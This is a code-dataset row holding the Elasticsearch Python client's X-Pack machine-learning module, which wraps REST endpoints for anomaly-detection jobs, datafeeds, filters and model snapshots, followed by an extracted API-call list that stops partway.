repo_name
stringlengths 7
94
| repo_path
stringlengths 4
237
| repo_head_hexsha
stringlengths 40
40
| content
stringlengths 10
680k
| apis
stringlengths 2
680k
|
---|---|---|---|---|
imiMoisesEducation/beatcookie-discbot | build/python-env/lib/python2.7/site-packages/elasticsearch/client/xpack/ml.py | 59c8be23346d8d2fc1777a2b08856df88e2ae5c2 | from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH
class MlClient(NamespacedClient):
@query_params('from_', 'size')
def get_filters(self, filter_id=None, params=None):
"""
:arg filter_id: The ID of the filter to fetch
:arg from_: skips a number of filters
:arg size: specifies a max number of filters to get
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'filters', filter_id), params=params)
@query_params()
def get_datafeeds(self, datafeed_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-datafeed.html>`_
:arg datafeed_id: The ID of the datafeeds to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id), params=params)
@query_params()
def get_datafeed_stats(self, datafeed_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-datafeed-stats.html>`_
:arg datafeed_id: The ID of the datafeeds stats to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_stats'), params=params)
@query_params('anomaly_score', 'desc', 'end', 'exclude_interim', 'expand',
'from_', 'size', 'sort', 'start')
def get_buckets(self, job_id, timestamp=None, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-bucket.html>`_
:arg job_id: ID of the job to get bucket results from
:arg timestamp: The timestamp of the desired single bucket result
:arg body: Bucket selection details if not provided in URI
:arg anomaly_score: Filter for the most anomalous buckets
:arg desc: Set the sort direction
:arg end: End time filter for buckets
:arg exclude_interim: Exclude interim results
:arg expand: Include anomaly records
:arg from_: skips a number of buckets
:arg size: specifies a max number of buckets to get
:arg sort: Sort buckets by a particular field
:arg start: Start time filter for buckets
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'buckets', timestamp),
params=params, body=body)
@query_params('reset_end', 'reset_start')
def post_data(self, job_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-post-data.html>`_
:arg job_id: The name of the job receiving the data
:arg body: The data to process
:arg reset_end: Optional parameter to specify the end of the bucket
resetting range
:arg reset_start: Optional parameter to specify the start of the bucket
resetting range
"""
for param in (job_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_data'), params=params,
body=self._bulk_body(body))
@query_params('force', 'timeout')
def stop_datafeed(self, datafeed_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-stop-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to stop
:arg force: True if the datafeed should be forcefully stopped.
:arg timeout: Controls the time to wait until a datafeed has stopped.
Default to 20 seconds
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_stop'), params=params)
@query_params()
def get_jobs(self, job_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-job.html>`_
:arg job_id: The ID of the jobs to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id), params=params)
@query_params()
def delete_expired_data(self, params=None):
"""
"""
return self.transport.perform_request('DELETE',
'/_xpack/ml/_delete_expired_data', params=params)
@query_params()
def put_job(self, job_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-job.html>`_
:arg job_id: The ID of the job to create
:arg body: The job
"""
for param in (job_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('PUT', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id), params=params, body=body)
@query_params()
def validate_detector(self, body, params=None):
"""
:arg body: The detector
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
return self.transport.perform_request('POST',
'/_xpack/ml/anomaly_detectors/_validate/detector', params=params,
body=body)
@query_params('end', 'start', 'timeout')
def start_datafeed(self, datafeed_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-start-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to start
:arg body: The start datafeed parameters
:arg end: The end time when the datafeed should stop. When not set, the
datafeed continues in real time
:arg start: The start time from where the datafeed should begin
:arg timeout: Controls the time to wait until a datafeed has started.
Default to 20 seconds
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_start'), params=params, body=body)
@query_params('desc', 'end', 'exclude_interim', 'from_', 'record_score',
'size', 'sort', 'start')
def get_records(self, job_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-record.html>`_
:arg job_id: None
:arg body: Record selection criteria
:arg desc: Set the sort direction
:arg end: End time filter for records
:arg exclude_interim: Exclude interim results
:arg from_: skips a number of records
:arg record_score:
:arg size: specifies a max number of records to get
:arg sort: Sort records by a particular field
:arg start: Start time filter for records
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'records'), params=params,
body=body)
@query_params()
def update_job(self, job_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-job.html>`_
:arg job_id: The ID of the job to create
:arg body: The job update settings
"""
for param in (job_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_update'), params=params, body=body)
@query_params()
def put_filter(self, filter_id, body, params=None):
"""
:arg filter_id: The ID of the filter to create
:arg body: The filter details
"""
for param in (filter_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('PUT', _make_path('_xpack', 'ml',
'filters', filter_id), params=params, body=body)
@query_params()
def update_datafeed(self, datafeed_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to update
:arg body: The datafeed update settings
"""
for param in (datafeed_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_update'), params=params, body=body)
@query_params()
def preview_datafeed(self, datafeed_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-preview-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to preview
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_preview'), params=params)
@query_params('advance_time', 'calc_interim', 'end', 'skip_time', 'start')
def flush_job(self, job_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-flush-job.html>`_
:arg job_id: The name of the job to flush
:arg body: Flush parameters
:arg advance_time: Advances time to the given value generating results
and updating the model for the advanced interval
:arg calc_interim: Calculates interim results for the most recent bucket
or all buckets within the latency period
:arg end: When used in conjunction with calc_interim, specifies the
range of buckets on which to calculate interim results
:arg skip_time: Skips time to the given value without generating results
or updating the model for the skipped interval
:arg start: When used in conjunction with calc_interim, specifies the
range of buckets on which to calculate interim results
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_flush'), params=params, body=body)
@query_params('force', 'timeout')
def close_job(self, job_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-close-job.html>`_
:arg job_id: The name of the job to close
:arg force: True if the job should be forcefully closed
:arg timeout: Controls the time to wait until a job has closed. Default
to 30 minutes
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_close'), params=params)
@query_params()
def open_job(self, job_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-open-job.html>`_
:arg job_id: The ID of the job to open
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_open'), params=params)
@query_params('force')
def delete_job(self, job_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-job.html>`_
:arg job_id: The ID of the job to delete
:arg force: True if the job should be forcefully deleted
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'anomaly_detectors', job_id), params=params)
@query_params()
def update_model_snapshot(self, job_id, snapshot_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to update
:arg body: The model snapshot properties to update
"""
for param in (job_id, snapshot_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'model_snapshots', snapshot_id,
'_update'), params=params, body=body)
@query_params()
def delete_filter(self, filter_id, params=None):
"""
:arg filter_id: The ID of the filter to delete
"""
if filter_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'filter_id'.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'filters', filter_id), params=params)
@query_params()
def validate(self, body, params=None):
"""
:arg body: The job config
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
return self.transport.perform_request('POST',
'/_xpack/ml/anomaly_detectors/_validate', params=params, body=body)
@query_params('from_', 'size')
def get_categories(self, job_id, category_id=None, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-category.html>`_
:arg job_id: The name of the job
:arg category_id: The identifier of the category definition of interest
:arg body: Category selection details if not provided in URI
:arg from_: skips a number of categories
:arg size: specifies a max number of categories to get
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'categories', category_id),
params=params, body=body)
@query_params('desc', 'end', 'exclude_interim', 'from_', 'influencer_score',
'size', 'sort', 'start')
def get_influencers(self, job_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-influencer.html>`_
:arg job_id: None
:arg body: Influencer selection criteria
:arg desc: whether the results should be sorted in decending order
:arg end: end timestamp for the requested influencers
:arg exclude_interim: Exclude interim results
:arg from_: skips a number of influencers
:arg influencer_score: influencer score threshold for the requested
influencers
:arg size: specifies a max number of influencers to get
:arg sort: sort field for the requested influencers
:arg start: start timestamp for the requested influencers
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'influencers'),
params=params, body=body)
@query_params()
def put_datafeed(self, datafeed_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to create
:arg body: The datafeed config
"""
for param in (datafeed_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('PUT', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id), params=params, body=body)
@query_params('force')
def delete_datafeed(self, datafeed_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to delete
:arg force: True if the datafeed should be forcefully deleted
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'datafeeds', datafeed_id), params=params)
@query_params()
def get_job_stats(self, job_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-job-stats.html>`_
:arg job_id: The ID of the jobs stats to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_stats'), params=params)
@query_params('delete_intervening_results')
def revert_model_snapshot(self, job_id, snapshot_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-revert-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to revert to
:arg body: Reversion options
:arg delete_intervening_results: Should we reset the results back to the
time of the snapshot?
"""
for param in (job_id, snapshot_id):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'model_snapshots', snapshot_id,
'_revert'), params=params, body=body)
@query_params('desc', 'end', 'from_', 'size', 'sort', 'start')
def get_model_snapshots(self, job_id, snapshot_id=None, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to fetch
:arg body: Model snapshot selection criteria
:arg desc: True if the results should be sorted in descending order
:arg end: The filter 'end' query parameter
:arg from_: Skips a number of documents
:arg size: The default number of documents returned in queries as a
string.
:arg sort: Name of the field to sort on
:arg start: The filter 'start' query parameter
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'model_snapshots', snapshot_id),
params=params, body=body)
@query_params()
def delete_model_snapshot(self, job_id, snapshot_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to delete
"""
for param in (job_id, snapshot_id):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'anomaly_detectors', job_id, 'model_snapshots', snapshot_id),
params=params)
| [((136, 165), 'elasticsearch.client.utils.query_params', 'query_params', (['"""from_"""', '"""size"""'], {}), "('from_', 'size')\n", (148, 165), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((543, 557), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (555, 557), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((940, 954), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (952, 954), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((1364, 1475), 'elasticsearch.client.utils.query_params', 'query_params', (['"""anomaly_score"""', '"""desc"""', '"""end"""', '"""exclude_interim"""', '"""expand"""', '"""from_"""', '"""size"""', '"""sort"""', '"""start"""'], {}), "('anomaly_score', 'desc', 'end', 'exclude_interim', 'expand',\n 'from_', 'size', 'sort', 'start')\n", (1376, 1475), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((2661, 2701), 'elasticsearch.client.utils.query_params', 'query_params', (['"""reset_end"""', '"""reset_start"""'], {}), "('reset_end', 'reset_start')\n", (2673, 2701), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((3533, 3565), 'elasticsearch.client.utils.query_params', 'query_params', (['"""force"""', '"""timeout"""'], {}), "('force', 'timeout')\n", (3545, 3565), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((4265, 4279), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (4277, 4279), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((4640, 4654), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (4652, 4654), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((4851, 4865), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (4863, 4865), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((5419, 5433), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (5431, 5433), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((5820, 5859), 'elasticsearch.client.utils.query_params', 'query_params', (['"""end"""', '"""start"""', '"""timeout"""'], {}), "('end', 'start', 'timeout')\n", (5832, 5859), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((6759, 6859), 'elasticsearch.client.utils.query_params', 'query_params', (['"""desc"""', '"""end"""', '"""exclude_interim"""', '"""from_"""', '"""record_score"""', '"""size"""', '"""sort"""', '"""start"""'], {}), "('desc', 'end', 'exclude_interim', 'from_', 'record_score',\n 'size', 'sort', 'start')\n", (6771, 6859), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((7802, 7816), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (7814, 7816), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((8404, 8418), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (8416, 8418), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((8898, 8912), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (8910, 8912), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((9532, 9546), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (9544, 9546), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((10074, 10147), 'elasticsearch.client.utils.query_params', 'query_params', (['"""advance_time"""', '"""calc_interim"""', '"""end"""', '"""skip_time"""', '"""start"""'], {}), "('advance_time', 'calc_interim', 'end', 'skip_time', 'start')\n", (10086, 10147), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((11398, 11430), 'elasticsearch.client.utils.query_params', 'query_params', (['"""force"""', '"""timeout"""'], {}), "('force', 'timeout')\n", (11410, 11430), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((12091, 12105), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (12103, 12105), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((12590, 12611), 'elasticsearch.client.utils.query_params', 'query_params', (['"""force"""'], {}), "('force')\n", (12602, 12611), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((13160, 13174), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (13172, 13174), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((13922, 13936), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (13934, 13936), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((14335, 14349), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (14347, 14349), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((14708, 14737), 'elasticsearch.client.utils.query_params', 'query_params', (['"""from_"""', '"""size"""'], {}), "('from_', 'size')\n", (14720, 14737), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((15567, 15671), 'elasticsearch.client.utils.query_params', 'query_params', (['"""desc"""', '"""end"""', '"""exclude_interim"""', '"""from_"""', '"""influencer_score"""', '"""size"""', '"""sort"""', '"""start"""'], {}), "('desc', 'end', 'exclude_interim', 'from_', 'influencer_score',\n 'size', 'sort', 'start')\n", (15579, 15671), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((16782, 16796), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (16794, 16796), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((17389, 17410), 'elasticsearch.client.utils.query_params', 'query_params', (['"""force"""'], {}), "('force')\n", (17401, 17410), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((17996, 18010), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (18008, 18010), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((18398, 18440), 'elasticsearch.client.utils.query_params', 'query_params', (['"""delete_intervening_results"""'], {}), "('delete_intervening_results')\n", (18410, 18440), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((19283, 19344), 'elasticsearch.client.utils.query_params', 'query_params', (['"""desc"""', '"""end"""', '"""from_"""', '"""size"""', '"""sort"""', '"""start"""'], {}), "('desc', 'end', 'from_', 'size', 'sort', 'start')\n", (19295, 19344), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((20404, 20418), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (20416, 20418), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((460, 508), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""filters"""', 'filter_id'], {}), "('_xpack', 'ml', 'filters', filter_id)\n", (470, 508), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((853, 905), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id)\n", (863, 905), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((1267, 1329), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id', '"""_stats"""'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id, '_stats')\n", (1277, 1329), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((2515, 2607), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""results"""', '"""buckets"""', 'timestamp'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'results',\n 'buckets', timestamp)\n", (2525, 2607), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((3394, 3458), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""_data"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, '_data')\n", (3404, 3458), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((4169, 4230), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id', '"""_stop"""'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id, '_stop')\n", (4179, 4230), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((4550, 4605), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id)\n", (4560, 4605), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((5318, 5373), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id)\n", (5328, 5373), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((6651, 6713), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id', '"""_start"""'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id, '_start')\n", (6661, 6713), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((7667, 7744), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""results"""', '"""records"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'results', 'records')\n", (7677, 7744), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((8292, 8358), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""_update"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, '_update')\n", (8302, 8358), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((8804, 8852), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""filters"""', 'filter_id'], {}), "('_xpack', 'ml', 'filters', filter_id)\n", (8814, 8852), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((9423, 9486), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id', '"""_update"""'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id, '_update')\n", (9433, 9486), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((9975, 10039), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id', '"""_preview"""'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id, '_preview')\n", (9985, 10039), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((11287, 11352), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""_flush"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, '_flush')\n", (11297, 11352), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((11991, 12056), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""_close"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, '_close')\n", (12001, 12056), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((12491, 12555), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""_open"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, '_open')\n", (12501, 12555), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((13070, 13125), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id)\n", (13080, 13125), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((13766, 13868), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""model_snapshots"""', 'snapshot_id', '"""_update"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'model_snapshots',\n snapshot_id, '_update')\n", (13776, 13868), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((14252, 14300), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""filters"""', 'filter_id'], {}), "('_xpack', 'ml', 'filters', filter_id)\n", (14262, 14300), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((15416, 15513), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""results"""', '"""categories"""', 'category_id'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'results',\n 'categories', category_id)\n", (15426, 15513), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, 